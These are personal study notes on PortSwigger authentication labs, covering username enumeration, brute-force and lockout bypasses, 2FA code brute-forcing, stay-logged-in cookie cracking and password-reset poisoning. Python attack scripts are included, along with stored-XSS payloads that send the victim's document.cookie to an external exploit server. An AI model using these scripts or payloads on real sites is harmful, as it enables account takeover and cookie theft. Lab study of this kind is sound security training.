[TOC]
# Basic Concept
## Logic Views
Stealing password reset tokens.
![圖片](https://hackmd.io/_uploads/BydO1XtlA.png)
## Authentication Factors
Common Authenticated factors
**We know**
- password
**We Have**
- Mobile phone or security token
**We can do**
- Biometrics or behavior
## Authentication && Authorization
**Authentication**
Authentication is a process of Verifying the user identity
**Authorization**
Once the user is authenticated, their privileges determine what they are authorize to do.
## Vulnerabilities Arise
### No brute force Protection
### Program Logic Flaws
Program allows attacker leverage Unexpected behavior to bypass Auth.
## Impact
### low Privilege Accounts
Low privilege account allow attacker to steal the personal information, money ....
### Admin Account (Goal)
Once we have admin account, we can attempt to modify the the website configuration, to upload the web shell
Find out a way to Run Arbitrary code in website.
# Password-based Vulnerabilities
## Weakness
It allow attack to enumerate username and crack password by brute-force Attack
## Brute Force Attack
### Username Enumeration
This vulnerability typically occurs in forget password page!
```
admin@somecompany.com
```
### Password Policy (High-Entropy password)
If website allow us to register the account
We can exploit the functionality to understand password policies
### Observation When we perform Brute Force Attacke
- Statue code
- Error message
- Response time
### LAB-1 Username Enumeration (Response Length)
Username Directory
https://portswigger.net/web-security/authentication/auth-lab-usernames
Password Directory
https://portswigger.net/web-security/authentication/auth-lab-passwords
Login Page
```
POST /login HTTP/2
Host: 0a1300be03e9f1b4808fbcf60064005d.web-security-academy.net
Cookie: session=RyZyjhbAo71qMSKopNdoJ2k9ntbDU7C1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Origin: https://0a1300be03e9f1b4808fbcf60064005d.web-security-academy.net
Referer: https://0a1300be03e9f1b4808fbcf60064005d.web-security-academy.net/login
username=meowehecker&password=meowhecker
```
Response(Error Message)
![](https://hackmd.io/_uploads/H1lqK4SK3.png)
Invalid username -> Error message
#### Enumerate User name
Configuration
![](https://hackmd.io/_uploads/r1byfESF2.png)
![](https://hackmd.io/_uploads/SkmLfEBFh.png)
![](https://hackmd.io/_uploads/B1o2zNHF2.png)
Perform Attack
![](https://hackmd.io/_uploads/HJzLc4HYn.png)
![](https://hackmd.io/_uploads/HymdcNrK3.png)
User Name: auto (Valid)
#### Password Cracking
![](https://hackmd.io/_uploads/HkYEsESK3.png)
![](https://hackmd.io/_uploads/By6SiVHKn.png)
---
sunshine -> Status code 302(Template Redirection)
![](https://hackmd.io/_uploads/rJEy2NHt3.png)
username:auto
password:sunshine
![](https://hackmd.io/_uploads/r1u8h4HFh.png)
![](https://hackmd.io/_uploads/BJlO3VSFn.png)
Solved
---
### LAB 2 Username enumeration via subtly different responses
Username Directory
https://portswigger.net/web-security/authentication/auth-lab-usernames
Password Directory
https://portswigger.net/web-security/authentication/auth-lab-passwords
Analysis Request/Response
![](https://hackmd.io/_uploads/rJtc04Ht3.png)
**Username Enumeration**
Payload Setting
![](https://hackmd.io/_uploads/B1I-fSrFh.png)
**Find Password**
![](https://hackmd.io/_uploads/r1ZIfHHth.png)
![](https://hackmd.io/_uploads/BkZmlISYh.png)
password:killer
**login**
account:archie
password:killer
![](https://hackmd.io/_uploads/BkzceIrKn.png)
![](https://hackmd.io/_uploads/SyBogISFh.png)
Solve
## Bypass IP-base Protection
X-Forwarded-for header is used to tell the back-end service what the client Ip
```
X-Forwarded-For
```
Sample code
```javascript
const express = require('express');
const app = express();
app.get('/', (req, res) => {
// req.headers['x-forwarded-for']='10.10.10.1'
const clientIp = req.headers['x-forwarded-for'] || req.connection.remoteAddress;
res.send(`Client IP: ${clientIp}`);
});
app.listen(3000, () => {
console.log('Server listening on port 3000');
});
```
```
npm install express
node "app.js"
```
```bash
curl -H "X-Forwarded-For:10.10.10.1" 127.0.0.1:3000
```
![圖片](https://hackmd.io/_uploads/B1JxzBFgC.png)
### Lab-1: Brute-force (Response Time ) && Bypass IP-Base Protection
- Your credentials: `wiener:peter`
- [Candidate usernames](https://portswigger.net/web-security/authentication/auth-lab-usernames)
- [Candidate passwords](https://portswigger.net/web-security/authentication/auth-lab-passwords)
#### Site map
![圖片](https://hackmd.io/_uploads/rySajHFl0.png)
#### Dynamic Parameters
```
/login
/post
```
![圖片](https://hackmd.io/_uploads/ryxy3rYxC.png)
#### Restriction
![圖片](https://hackmd.io/_uploads/ByjQjHtg0.png)
#### Bypass the limit Restriction
Way1 Ip bypass
```
X-Forwarded-For:x
```
#### Enumerate Username Via Response Time
Attack Type -> Pichfork
Position 1 -> X-Forwarded-For Value
Position 2 -> Enumerate User Name
![圖片](https://hackmd.io/_uploads/BksNvfqe0.png)
Potential Password
![圖片](https://hackmd.io/_uploads/H1vddM5lA.png)
```
username=ao&password=MEOWHACKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKHACKEHACKERhhhhhhhhhhhhhhhhhhhhhhhhACKER
```
Username:ao
#### Exploit - Crack Password
![圖片](https://hackmd.io/_uploads/SJVMYGqlC.png)
```
Password:michael
```
**Login**
![圖片](https://hackmd.io/_uploads/rJ3l5z9g0.png)
Solve !!!
## Bypass flawed Brute force protection
Comment Protection Way
### Locking Account Access
Bypass Ways
- Password spray
### IP Block
Bypass Ways
- X-Forwarded-FOR Header
- If the website will reset the record of login, Once we login successfully. we cad register a valid account, and adding it into our wordlist
### LAB-1 Broken Brute-Force Protection (IP Block)
#### Site Map
![圖片](https://hackmd.io/_uploads/S15Lt4qx0.png)
#### Dynamic Parameters
![圖片](https://hackmd.io/_uploads/SJ6BFN9lR.png)
#### Identify
```
Post /login
```
![圖片](https://hackmd.io/_uploads/BywGYNqg0.png)
Attempt Limit = 3
![圖片](https://hackmd.io/_uploads/HJ_Gc45x0.png)
#### Bypass
Attempting Use X-Forwarded-For
![圖片](https://hackmd.io/_uploads/By0ejNcgA.png)
Failed
---
Attempting use reset mechanism to bypass Limit
Valid Account `winner:petter`
Bypass wordlist
```python
#!/usr/bin/python3
# Explioit - Reset Mechanism
# Some sysetms will reset the limt Counter When the user login successfully
import argparse
import traceback
class Color:
HEADER = '\033[95m'
BLUE = '\033[94m'
GREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
def moewBanner():
print(Color.HEADER + "##################################################")
print("# #")
print("# " + Color.GREEN + "MeowHecker is a cat. ^O^" + Color.HEADER + " #")
print("# #")
print("##################################################" + Color.ENDC)
print(Color.WARNING+"-> Author: Meowhecker\n" + Color.ENDC)
def readWordlistToList(filePath):
list = []
try:
with open(filePath, "r") as wordlist:
for line in wordlist:
list.append(line.rstrip()) # Remove "/n"
print("List:", list)
wordlist.close()
return list
except FileNotFoundError:
print("File not found:", filePath)
except Exception as e:
print("Error", e)
def MakeBypassWordList(originalWordList,BypassWordlistPath,attemptLimit):
with open(BypassWordlistPath,'w') as bypassWordlist:
for Counter, line in enumerate(originalWordList,start=1): #Using Enumereate Function to traverse whole list and assing index ! (Start Counter = 1)
bypassWordlist.write(line+'\n')
# Condiction -> Insert Valid String.
if Counter % (attemptLimit-1) == 0:
#print("Insert", valid, "in bypassWordlist")
bypassWordlist.write(valid+'\n')
print("BypassWordlist Done !")
bypassWordlist.close()
return Counter # Number of lines (For Making usernameList)
def MakeUsernameWordlist(TargetUserName, ValidUserName, bypassWordlistLinsNum,attemptLimit):
with open(userWordlistPath,'w') as userWordlist:
Counter = 1
for line in range(bypassWordlistLinsNum):
userWordlist.write(TargetUserName+'\n')
if Counter % (attemptLimit-1) == 0 :
#print("Insert", ValidUserName, "in userWordlist")
userWordlist.write(ValidUserName+'\n')
Counter = Counter + 1
print("UserWordlist - Done !")
userWordlist.close()
# Main() !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# Configure Parameters
parsers = argparse.ArgumentParser(description='Meowhecker is a Cat')
parsers.add_argument("attemptLimit", type=int)
parsers.add_argument("valid", type= str)
parsers.add_argument("targetUserName", type=str)
parsers.add_argument("validUserName", type=str)
parsers.add_argument("-O", "--originalWordList", default="./defaultWordlist.txt")
parsers.add_argument("-B", "--bypassWordlist", default="./bypassWordlist.txt")
parsers.add_argument("-U", "--userWordlist", default="./userWordlist.txt")
args = parsers.parse_args()
originalWordList = args.originalWordList
BypassWordlistPath = args.bypassWordlist
attemptLimit = args.attemptLimit
valid = args.valid
targetUserName= args.targetUserName
validUserName = args.validUserName
userWordlistPath = args.userWordlist
moewBanner()
DefaultWordList = readWordlistToList(originalWordList)
bypassWordlistLinsNum = MakeBypassWordList(DefaultWordList,BypassWordlistPath,attemptLimit)
MakeUsernameWordlist(targetUserName,validUserName,bypassWordlistLinsNum, attemptLimit)
```
Run the Following Command
```
python3 addingValidBypassIpBlock.py 2 peter carlos wiener
```
![圖片](https://hackmd.io/_uploads/rkoxDpsgA.png)
Treads = 1 (Notice!!!)
![圖片](https://hackmd.io/_uploads/HyDHiioeR.png)
![圖片](https://hackmd.io/_uploads/BJaAqoilC.png)
![圖片](https://hackmd.io/_uploads/Sk-Eqsjl0.png)
#### Login
![圖片](https://hackmd.io/_uploads/HywO5osxC.png)
Successfully
### LAB-2 Enumerate Username Via Account Lock
#### Site Map
![圖片](https://hackmd.io/_uploads/B1evWnjlC.png)
#### Dynamic Parameters
![圖片](https://hackmd.io/_uploads/SJPobnjgR.png)
#### Identify
Confirm Defense Mechanisms
![圖片](https://hackmd.io/_uploads/SJ4IWnolR.png)
Testing the website whether have account lock
![圖片](https://hackmd.io/_uploads/SkETm3sgR.png)
![圖片](https://hackmd.io/_uploads/H1NEE3jeR.png)
Website have Account locked
Username:albuquerque
Crack the password
![圖片](https://hackmd.io/_uploads/r1k042slA.png)
Attempt login Website via
```
albuquerque:1qaz2wsx
```
Login
![圖片](https://hackmd.io/_uploads/H1nZShieA.png)
solved
## Limit Rate
Limit rate restriction typically through ip block to defense malicious IP.
Bypass Way
1. Base on time controller script.
2. Carry Multiple Credential in Single HTTP request.
3. Race Condition
### LAB-1 Bypass Limit Rate via Multiple Credential Per Request.
#### Site Map
![圖片](https://hackmd.io/_uploads/H1Tk90oxA.png)
#### Dynamic Parameters
![圖片](https://hackmd.io/_uploads/S1yZ9RsgR.png)
#### Identify
**Confirm Defense Mechanisms**
IP Block / Limit Rate
![圖片](https://hackmd.io/_uploads/By_7qAsg0.png)
-> Json format (Credentials)
**Bypass**
Carry Multiple credential in one Http Request
Convert Wordlist.txt to json list
```python
import json
filePath = "./wordlist.txt"
class Color:
HEADER = '\033[95m'
BLUE = '\033[94m'
GREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
def moewBanner():
print(Color.HEADER + "##################################################")
print("# #")
print("# " + Color.GREEN + "MeowHecker is a cat. ^O^" + Color.HEADER + " #")
print("# #")
print("##################################################" + Color.ENDC)
print(Color.WARNING+"-> Author: Meowhecker\n" + Color.ENDC)
def readWordlistToList(filePath):
list = []
try:
with open(filePath, "r") as wordlist:
for line in wordlist:
list.append(line.rstrip()) # Remove "/n"
#print("List:", list)
wordlist.close()
return list
except FileNotFoundError:
print("File not found:", filePath)
except Exception as e:
print("Error", e)
def converListToJson(pythonList):
if pythonList:
jsonList = json.dumps(pythonList)
return jsonList
else:
print("No python list")
return None
# Main function
moewBanner()
wordlist = readWordlistToList(filePath)
jsonList = converListToJson(wordlist)
print("JSON list:", jsonList)
```
Result
![圖片](https://hackmd.io/_uploads/ByJhq0slA.png)
#### Exploit
![圖片](https://hackmd.io/_uploads/HJS1rCoeC.png)
![圖片](https://hackmd.io/_uploads/ByysF0olA.png)
![圖片](https://hackmd.io/_uploads/S1spYAoeC.png)
Solved
# Multi-Factor Authentication-Vulnerabilities
## 2FA Two Factor Authentication
Flawed Design:
Email VC + Password (Knowledge Authentication) ->
## Two-factor authentication tokens
(Password - We know) (Device Verify Code - We have)
Attacks
1.SIM Card Hijack
2.Message Intercept
### LAB-1 Bypassing via Session check flawed
Valid Credentials
-> wiener:peter
Target Accounts
-> carlos:montoya
#### Site Map
![圖片](https://hackmd.io/_uploads/SyfsuJRe0.png)
#### Dynamic Parameters
![圖片](https://hackmd.io/_uploads/Sy-6dJ0g0.png)
#### Identify
![圖片](https://hackmd.io/_uploads/Hy3VtyRxR.png)
![圖片](https://hackmd.io/_uploads/HJswFJCgC.png)
**Confirm Defense Mechanisms**
Website have 2 FA Authentication
Flaw Design
-> Password (We know)
-> Email code (We know)
Bypass Possible !
**Bypass**
Test:1
Testing parameter to Carlos (IDOR)
![圖片](https://hackmd.io/_uploads/rJ_0YyClA.png)
Faill !!
Page will be redirect to login page
---
Test:2
Testing Session parameter
![圖片](https://hackmd.io/_uploads/SyQYsJAl0.png)
![圖片](https://hackmd.io/_uploads/HkVNa1ClA.png)
![圖片](https://hackmd.io/_uploads/BkV_ak0lA.png)
Work
/Account Page didn't check the session whether have login2 check flag & IDOR -> Allow us to bypass email code check !
#### Exploit
Login Carlos Account
![圖片](https://hackmd.io/_uploads/Hk1Q2y0lC.png)
![圖片](https://hackmd.io/_uploads/rkaK3JCxC.png)
![圖片](https://hackmd.io/_uploads/B1kkpy0lR.png)
Solved!
## Flawed Two-Factor Verification Logic
![圖片](https://hackmd.io/_uploads/HkDlQeCxA.png)
### LAB-1 Get/ login2 Can trigger carlos email valid code (Flawed Logic)
credentials: wiener:peter
Victim's username: carlos
#### Site Map
![圖片](https://hackmd.io/_uploads/HycBreAxC.png)
#### Dynamic Parameters
![圖片](https://hackmd.io/_uploads/rJDIHl0eC.png)
#### Identify
Testing Authentication Functionality.
**Confirm Defense Mechanisms**
Website have 2 FA Authentication
Flaw Design
-> Password (We know)
-> Email code (We know) (Get/login2 )
Same Factor Auth!
**Bypass**
![圖片](https://hackmd.io/_uploads/H1wH8gAlR.png)
![圖片](https://hackmd.io/_uploads/B1GcLx0eC.png)
![圖片](https://hackmd.io/_uploads/BJtXwgRlC.png)
Brute Forcing -> Guessing Valid Code
![圖片](https://hackmd.io/_uploads/rkNIwgRgR.png)
We Found
![圖片](https://hackmd.io/_uploads/rJvsYlCxR.png)
Another Way
```python=
#Author: MeowHecker 侯智晟
# Bypass 2FA Auth
import requests
import threading
import sys
url = "https://0ae900ed033f23288166aceb000b003c.web-security-academy.net/login2"
Headers = {'Host': ' 0ae900ed033f23288166aceb000b003c.web-security-academy.net', 'Cookie': ' verify=carlos; session=706d8zav60yMRSaANT9QUOdIQVYkXLhw', 'Content-Length': ' 13', 'Cache-Control': ' max-age=0', 'Sec-Ch-Ua': ' "Not_A Brand";v="8", "Chromium";v="120"', 'Sec-Ch-Ua-Mobile': ' ?0', 'Sec-Ch-Ua-Platform': ' "Windows"', 'Upgrade-Insecure-Requests': ' 1', 'Origin': ' https://0ae900ed033f23288166aceb000b003c.web-security-academy.net', 'Content-Type': ' application/x-www-form-urlencoded', 'User-Agent': ' Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36', 'Accept': ' text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'Sec-Fetch-Site': ' same-origin', 'Sec-Fetch-Mode': ' navigate', 'Sec-Fetch-User': ' ?1', 'Sec-Fetch-Dest': ' document', 'Referer': ' https://0ae900ed033f23288166aceb000b003c.web-security-academy.net/login2', 'Accept-Encoding': ' gzip, deflate, br', 'Accept-Language': ' zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7', 'Priority': ' u=0, i'}
Request Times = 0
def sendRequest(payload,sem):
global Request Times
payloads = {
"Payload": payload
}
# Send request and save Response
response = requests.post(url,headers = Headers,data=payloads)
print(f'Request Times{Request Times}:stauts code:{response.status_code} payloads: {payload}')
Request Times = Request Times + 1
# Target / Success ? (Status code)
if(response.status_code != 200): # Found !!!!!!!
print(f"Payload: {payload}, Response: {response.text}")
sys.exit()
sem.release() # Release Singal
sys.exit() # Termerate Threading Process
def threadingF():
maxThreading = 20
sem = threading.BoundedSemaphore(maxThreading)
for i in range(10000):
# Custom Payload
payload = str(i).zfill(4)
sem.acquire()
sendRequestHandler = threading.Thread(target=sendRequest, args=(payload,sem))
sendRequestHandler.start()
print("Number of active threads:", threading.active_count())
sys.exit()
threadingF()
sys.exit()
```
#### Exploit
![圖片](https://hackmd.io/_uploads/SJicYe0xA.png)
Solved
### LAB-2 2FA Bypassing CSRF Token
Victim's credentials: `carlos:montoya`
#### Site Map
#### Dynamic Parameters
#### Identify
**Confirm Defense Mechanisms**
CSRF Token!
But CSRF can't not defense
![圖片](https://hackmd.io/_uploads/ryHlefCxC.png)
Using macro automatically greps token
**Bypass**
![圖片](https://hackmd.io/_uploads/Hkatw7RxC.png)
Using Macro to handle CSRF problems
![圖片](https://hackmd.io/_uploads/B1JH-mAeC.png)
![圖片](https://hackmd.io/_uploads/HyNsIm0gC.png)
![圖片](https://hackmd.io/_uploads/BkB-fXReA.png)
#### Exploit
Notice As Each we test the validation code will be reset, we may need to repeat the attack several time
Treads = 1
# Other Authentication Mechanism
## Cookie Login !
Keep User login functionality typically is implemented by cookie
If cookie value can be analysis, we can guess the victim's cookie and login as victim identity
Cookie - Flawed design
-> Encode
-> Hash (Not with salt )
### LAB-1 Brute-forcing / Stay-Logged-in cookie can be cracked
Valid credentials: wiener:peter
Victim's username: carlos
https://portswigger.net/web-security/authentication/auth-lab-passwords
#### Site Map
![圖片](https://hackmd.io/_uploads/S1J6E4ReR.png)
#### Dynamic Parameters
![圖片](https://hackmd.io/_uploads/BJwnNNAlR.png)
#### Identify
![圖片](https://hackmd.io/_uploads/Bk4-P4AeR.png)
**Confirm Defense Mechanisms**
Basic Password Auth
User cookie not be Correctly encrypted !!
**Bypass**
Analysis Stay-login Cookie
![圖片](https://hackmd.io/_uploads/HyLFwVCxR.png)
Base64 Decoded !!
```
wiener:51dc30ddc473d43a6011e9ebba6ca770
```
![圖片](https://hackmd.io/_uploads/BkuV_4RlR.png)
Password be hashed by md5
#### Exploit
```python=
import hashlib
import base64
class Banner:
HEADER = '\033[95m'
BLUE = '\033[94m'
GREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
def __init__(self):
self.meow_banner()
def meow_banner(self):
print(self.HEADER + "##################################################")
print("# #")
print("# " + self.GREEN + "MeowHecker is a cat. ^O^" + self.HEADER + " #")
print("# #")
print("##################################################" + self.ENDC)
print(self.WARNING + "-> Author: Meowhecker\n" + self.ENDC)
def readWordlistToList(filePath):
list = []
try:
with open(filePath, "r") as wordlist:
for line in wordlist:
list.append(line.rstrip()) # Remove "/n"
#print("List:", list)
wordlist.close()
return list
except FileNotFoundError:
print("File not found:", filePath)
except Exception as e:
print("Error", e)
def readWordlistToHashList(wordlist):
hashList = []
for string in wordlist:
hashString = hashlib.md5(string.encode()).hexdigest() # md5 input must be Binary String(b"string" - 0~255)
hashList.append(hashString)
print(hashList)
return hashList
def writeHashListToFile(hashList,hashFilePath):
with open(hashFilePath, 'w') as hashFile:
for hash in hashList:
hashFile.write(hash + '\n')
print(hashList)
hashFile.close()
def addingPrifixBase64Encode(hashList):
finalPayloadList = []
for hash in hashList:
prifixAndPass = 'carlos:'+hash
Encode = base64.b64encode(prifixAndPass.encode()).decode()
finalPayloadList.append(Encode)
return finalPayloadList
def writeFinalPayloadToFile(finalPayloadList,finalPayloadPath):
with open(finalPayloadPath, 'w') as hashFile:
for hash in finalPayloadList:
hashFile.write(hash + '\n')
hashFile.close()
banner=Banner()
filePath="./wordlist.txt"
hashFilePath="./hashList.txt"
finalPayloadPath ="./finalPayload.txt"
wordlist=readWordlistToList(filePath)
hashList = readWordlistToHashList(wordlist)
writeHashListToFile(hashList,hashFilePath)
finalPayloadList = addingPrifixBase64Encode(hashList)
writeFinalPayloadToFile(finalPayloadList,finalPayloadPath)
```
這個LAB 壞了 A
### Lab - 2 Offline Password Cracking
#### Site Map
![圖片](https://hackmd.io/_uploads/Bk--q8kWR.png)
#### Dynamic Parameters
![圖片](https://hackmd.io/_uploads/HJOp9LkWC.png)
#### Identify
![圖片](https://hackmd.io/_uploads/ry3YsIkW0.png)
**Confirm Defense Mechanisms**
No HTTP only
Cookie can be cracked (base64 + hash)
**Bypass**
Testing comment functionality to find the place to execute javascript
We need to do two things
1. Grep the Victim cookie via javascript
2. Passing Victim cookie to our server listener.
![圖片](https://hackmd.io/_uploads/ByFlaLkWC.png)
```html
<svg onload=prompt()>
```
![圖片](https://hackmd.io/_uploads/SyEVTL1Z0.png)
Successful
```html
<svg onload=alert(document.cookie)>
```
![圖片](https://hackmd.io/_uploads/ryxnA8kZR.png)
Store XSS Found !
#### Exploit
Exploit XSS vulnerability to execute arbitrary JavaScript
Pass the Victim's cookie to exploit server
Payload work
```
<svg onload=
document.location='//exploit-0a9500bb032c0b9680c634b101d400fc.exploit-server.net/exploit?log='+document.cookie></svg>
```
Work
```
<script>window.location.href = "https://exploit-0a9c0098048473df859011c101d70033.exploit-server.net/exploit?log=" + document.cookie;</script>
```
Work
Victim Cookie
```
secret=O9VA9feGEVoEVmm1Lm0R37IwAUMzQhqO;%20stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz
```
Base64 Decode
```
secret=;Õ@õ÷ZViµ.mß²0C3B;%ÛK-k- y-in=carlos:26323c16d5f4dabff3bb136f2460a943
```
login as victim Cookie ->
```
stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz
```
Not Work
Crack Cookie
![圖片](https://hackmd.io/_uploads/rkWzetJ-A.png)
Login
![圖片](https://hackmd.io/_uploads/H1pHA_kWA.png)
```
carlos
onceuponatime
```
![圖片](https://hackmd.io/_uploads/SJ-ngFkWR.png)
![圖片](https://hackmd.io/_uploads/HyUpxFyb0.png)
Solved !
## Resetting password Mechanism
### Send password by email
Some website will send the password to mail
User have multiple device which will automatically sync their mail box, we can intercept the mail if the mail pass cross insecure channel
### Resetting password via URL
```
http://vulnerable-website.com/reset-password?user=Valid-user
```
Reset page will check the token whether are valid
```
http://vulnerable-website.com/reset-password?token=a0ba0d1cb3b63d13822572fcff1a241895d893f659164d4cc550b421ebdd48a8
```
If token match -> Redirect to reset page
### LAB 1: Refresh From To bypass token check
Credentials: wiener:peter
Victim's username: carlos
#### Site Map
![圖片](https://hackmd.io/_uploads/rkmKKFk-R.png)
#### Dynamic Parameters
![圖片](https://hackmd.io/_uploads/H1ZqYtJWR.png)
#### Identify
**Confirm Defense Mechanisms**
Reset password require -> Token (It can receive from mail)
**Bypass**
![圖片](https://hackmd.io/_uploads/B1dTiYJbR.png)
#### Exploit
![圖片](https://hackmd.io/_uploads/BkeU4oF1-0.png)
![圖片](https://hackmd.io/_uploads/HybrjYk-R.png)
Solved !
### LAB-2 Password Reset Poisoning via (Proxy, X-Forward-For Injection)
#### Site Map
![圖片](https://hackmd.io/_uploads/BydQ55J-0.png)
#### Dynamic Parameters
![圖片](https://hackmd.io/_uploads/H1RP9q1Z0.png)
#### Identify
![圖片](https://hackmd.io/_uploads/H1IUgjJZ0.png)
Website -> Have Proxy
Attack Vector
- X-Forwarded-Host (Record Client Domain)
![圖片](https://hackmd.io/_uploads/Hk9TfXpZ0.png)
**Confirm Defense Mechanisms**
Password require reset token(Email)
**Bypass**
![圖片](https://hackmd.io/_uploads/BkMHko1bA.png)
If reset password domain can manipulate by our Header inject, It may allow us to change the Victim password
#### Exploit
![圖片](https://hackmd.io/_uploads/rktQXs1bA.png)
![圖片](https://hackmd.io/_uploads/S1q8nYeZC.png)
```
bx8yy156n1xo1vl84kgdio2hxz6od0kx
```
![圖片](https://hackmd.io/_uploads/H1_SvikZC.png)
![圖片](https://hackmd.io/_uploads/BJm6Ds1-C.png)
Solved
## User Password Change Mechanism
Flawed Design:
Some website will use hide user value to identify who want to change password.
### LAB-3 Passing Current User Parameter in Password Change
Your credentials: wiener:peter
Victim's username: carlos
#### Site Map
![圖片](https://hackmd.io/_uploads/BkZA8qgZC.png)
#### Dynamic Parameters
![圖片](https://hackmd.io/_uploads/B1GkPqgWC.png)
#### Identify
**Flawed Design**
Password change parameter shouldn't pass current user parameter
![圖片](https://hackmd.io/_uploads/H1W4vcxW0.png)
![圖片](https://hackmd.io/_uploads/Hk7g65lZC.png)
![圖片](https://hackmd.io/_uploads/Hy7Mp5l-A.png)
**Confirm Defense Mechanisms**
**Bypass**
#### Exploit
![圖片](https://hackmd.io/_uploads/ryh4aqlbR.png)
![圖片](https://hackmd.io/_uploads/rkEOT9ebA.png)
```
carlos
moscow
```
![圖片](https://hackmd.io/_uploads/SkenTqlb0.png)
Solved !
<!--
#### Site Map
#### Dynamic Parameters
#### Identify
**Confirm Defense Mechanisms**
**Bypass**
#### Exploit
-->
Owner 侯智晟 meowheckerouo@gmail.com